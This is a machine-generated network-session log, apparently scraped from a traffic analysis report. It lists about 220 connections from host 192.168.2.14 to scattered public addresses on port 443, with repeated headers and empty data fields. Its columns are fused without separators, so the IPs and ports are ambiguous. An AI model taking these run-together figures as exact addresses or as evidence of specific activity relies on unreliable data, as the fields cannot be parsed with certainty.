                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10780192.168.2.1444398219.196.221.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10781192.168.2.1438518190.227.217.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10782192.168.2.1457856112.14.253.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10783192.168.2.1443630189.51.94.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10784192.168.2.1458778189.241.236.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10785192.168.2.1458228121.143.35.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10786192.168.2.1457974138.16.66.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10787192.168.2.14528568.147.137.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10788192.168.2.1449234151.84.152.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10789192.168.2.1460376162.24.239.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10790192.168.2.1458280209.117.62.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10791192.168.2.1436508217.80.116.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10792192.168.2.1433338164.174.115.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10793192.168.2.1458722217.125.86.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10794192.168.2.1434884114.254.147.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10795192.168.2.145542061.74.56.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10796192.168.2.1433544122.29.71.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10797192.168.2.144911837.171.165.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10798192.168.2.144145284.98.66.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10799192.168.2.1447354195.113.208.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10800192.168.2.145558219.27.119.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10801192.168.2.1452654136.233.169.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10802192.168.2.145161076.151.233.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10803192.168.2.145636417.235.88.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10804192.168.2.1450778169.102.9.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10805192.168.2.1457802162.27.178.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10806192.168.2.1459898198.145.3.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10807192.168.2.1453394142.90.162.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10808192.168.2.1458622162.42.255.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10809192.168.2.1448136137.47.205.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10810192.168.2.1457904171.8.216.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10811192.168.2.1455628121.220.60.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10812192.168.2.1453328211.239.253.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10813192.168.2.143644673.31.98.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10814192.168.2.1452064209.145.16.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10815192.168.2.145116254.181.85.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10816192.168.2.144303834.122.16.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10817192.168.2.145051818.35.210.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10818192.168.2.145176680.67.85.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10819192.168.2.144929013.137.200.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10820192.168.2.1442072164.247.81.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10821192.168.2.145172848.112.169.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10822192.168.2.1436404203.141.215.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10823192.168.2.14406681.88.115.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10824192.168.2.145600873.248.72.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10825192.168.2.1441702221.153.106.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10826192.168.2.1441680187.129.189.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10827192.168.2.144361889.177.153.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10828192.168.2.145738617.236.168.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10829192.168.2.144560288.239.205.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10830192.168.2.1444782154.15.61.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10831192.168.2.1446666133.235.235.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10832192.168.2.145184679.101.209.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10833192.168.2.144454079.28.56.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10834192.168.2.145977827.234.254.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10835192.168.2.144099417.55.30.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10836192.168.2.1432974144.150.22.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10837192.168.2.144687289.112.241.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10838192.168.2.1459962149.130.228.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10839192.168.2.1449888113.207.204.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10840192.168.2.1453698121.6.50.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10841192.168.2.1440450178.42.175.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10842192.168.2.146047480.131.203.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10843192.168.2.14573269.57.67.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10844192.168.2.1440056131.228.181.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10845192.168.2.143866086.16.210.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10846192.168.2.144023269.167.79.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10847192.168.2.1439558181.97.132.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10848192.168.2.1449562189.12.92.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10849192.168.2.1450394146.236.212.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10850192.168.2.1447462194.204.65.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10851192.168.2.145221888.74.212.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10852192.168.2.143473682.116.65.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10853192.168.2.1459452129.178.31.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10854192.168.2.145942840.176.16.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10855192.168.2.1443406108.64.224.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10856192.168.2.1445664168.232.129.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10857192.168.2.143797496.4.43.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10858192.168.2.1433594112.122.16.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10859192.168.2.1458806118.206.182.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10860192.168.2.1455386192.176.38.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10861192.168.2.1442202167.212.239.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10862192.168.2.144270464.217.144.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10863192.168.2.1439626162.202.229.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10864192.168.2.143594488.164.104.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10865192.168.2.1449196212.209.192.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10866192.168.2.1433792179.2.96.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10867192.168.2.1453836151.140.22.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10868192.168.2.1449602184.94.212.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10869192.168.2.144944244.125.161.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10870192.168.2.1450052201.191.102.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10871192.168.2.1435956175.169.145.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10872192.168.2.144105099.136.56.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10873192.168.2.144804675.61.86.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10874192.168.2.143611437.123.248.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10875192.168.2.1445324176.161.158.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10876192.168.2.1456268195.53.204.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10877192.168.2.144004020.23.97.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10878192.168.2.1458516154.111.224.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10879192.168.2.1437760111.35.255.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10880192.168.2.1451826132.159.251.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10881192.168.2.1444236219.49.91.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10882192.168.2.143584259.149.146.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10883192.168.2.143328685.140.76.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10884192.168.2.1458920209.116.7.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10885192.168.2.1439906159.20.153.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10886192.168.2.1456632191.255.255.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10887192.168.2.1438006206.30.209.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10888192.168.2.1458408169.58.85.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10889192.168.2.145559444.120.22.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10890192.168.2.1445232204.235.193.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10891192.168.2.145259094.185.8.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10892192.168.2.1442658220.60.29.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10893192.168.2.1460610131.154.128.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10894192.168.2.1435130141.5.199.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10895192.168.2.1455766139.34.238.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10896192.168.2.1440792193.162.178.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10897192.168.2.1446040115.243.27.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10898192.168.2.144301619.16.82.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10899192.168.2.1444620182.1.149.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10900192.168.2.144231881.100.1.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10901192.168.2.145588685.160.156.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10902192.168.2.145873432.157.58.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10903192.168.2.1433780163.174.123.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10904192.168.2.1448838183.110.98.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10905192.168.2.143289496.248.154.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10906192.168.2.145859266.14.28.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10907192.168.2.14380584.179.197.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10908192.168.2.144520858.14.48.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10909192.168.2.1460368122.238.45.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10910192.168.2.145565480.31.193.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10911192.168.2.145576260.59.242.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10912192.168.2.1455688157.34.222.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10913192.168.2.145387036.60.112.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10914192.168.2.144574092.209.62.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10915192.168.2.1459224220.82.42.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10916192.168.2.1434318108.168.202.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10917192.168.2.143620861.200.151.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10918192.168.2.145850450.38.4.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10919192.168.2.1451870100.158.84.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10920192.168.2.144211674.230.145.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10921192.168.2.1449354136.154.151.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10922192.168.2.1434308135.132.132.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10923192.168.2.144090877.63.28.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10924192.168.2.145058075.171.32.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10925192.168.2.1438196218.218.46.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10926192.168.2.14462648.164.127.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10927192.168.2.1458788101.145.59.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10928192.168.2.1445368207.234.209.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10929192.168.2.144028452.5.220.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10930192.168.2.145207665.83.152.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10931192.168.2.1435760185.130.176.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10932192.168.2.1441578126.115.45.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10933192.168.2.1445900103.246.50.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10934192.168.2.1441934206.85.74.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10935192.168.2.145913290.115.20.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10936192.168.2.1446192152.203.87.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10937192.168.2.1436920104.190.43.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10938192.168.2.145891840.54.58.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10939192.168.2.1451326125.97.63.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10940192.168.2.146061259.139.134.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10941192.168.2.1455260188.177.129.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10942192.168.2.145356899.158.158.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10943192.168.2.1443874134.253.170.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10944192.168.2.1441388136.244.0.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10945192.168.2.143666891.11.122.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10946192.168.2.1444980114.80.170.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10947192.168.2.145813425.233.140.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10948192.168.2.1434916147.9.81.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10949192.168.2.1454402158.249.212.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10950192.168.2.1447498206.16.244.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10951192.168.2.1433340193.112.113.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10952192.168.2.145475279.36.226.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10953192.168.2.144472876.209.20.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10954192.168.2.1459474101.124.106.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10955192.168.2.1435060175.225.83.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10956192.168.2.144168050.153.2.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10957192.168.2.143314438.99.235.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10958192.168.2.1459194136.54.100.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10959192.168.2.1442580126.42.236.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10960192.168.2.1460442153.74.34.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10961192.168.2.1452566123.150.90.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10962192.168.2.145070624.157.247.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10963192.168.2.1458992154.196.27.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10964192.168.2.144497438.196.138.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10965192.168.2.1433028209.191.250.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10966192.168.2.1439562172.241.27.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10967192.168.2.146075666.219.121.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10968192.168.2.1457048115.94.200.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10969192.168.2.1441946162.71.133.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10970192.168.2.143367657.249.45.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10971192.168.2.1449240190.238.82.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10972192.168.2.144476086.141.118.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10973192.168.2.143430239.128.104.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10974192.168.2.1445400147.53.118.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10975192.168.2.145971624.148.190.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10976192.168.2.143996494.149.19.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10977192.168.2.1455264143.24.44.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10978192.168.2.1452686101.201.72.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10979192.168.2.144492225.237.108.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10980192.168.2.1439366207.97.23.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10981192.168.2.1437470199.167.178.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10982192.168.2.1445476210.58.92.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10983192.168.2.1451140203.3.206.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10984192.168.2.1450950118.105.121.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10985192.168.2.1443200204.57.240.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10986192.168.2.1458700183.130.104.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10987192.168.2.144968237.17.98.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10988192.168.2.145912432.181.73.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10989192.168.2.143333899.145.88.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10990192.168.2.1460518208.172.254.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10991192.168.2.143715831.85.122.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10992192.168.2.145225213.127.136.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10993192.168.2.144907483.41.38.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10994192.168.2.144746014.252.120.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10995192.168.2.1450022208.168.230.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10996192.168.2.1439704148.104.229.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10997192.168.2.1448138114.135.20.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10998192.168.2.14402985.13.242.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10999192.168.2.144388872.28.219.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11000192.168.2.1451040102.21.35.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
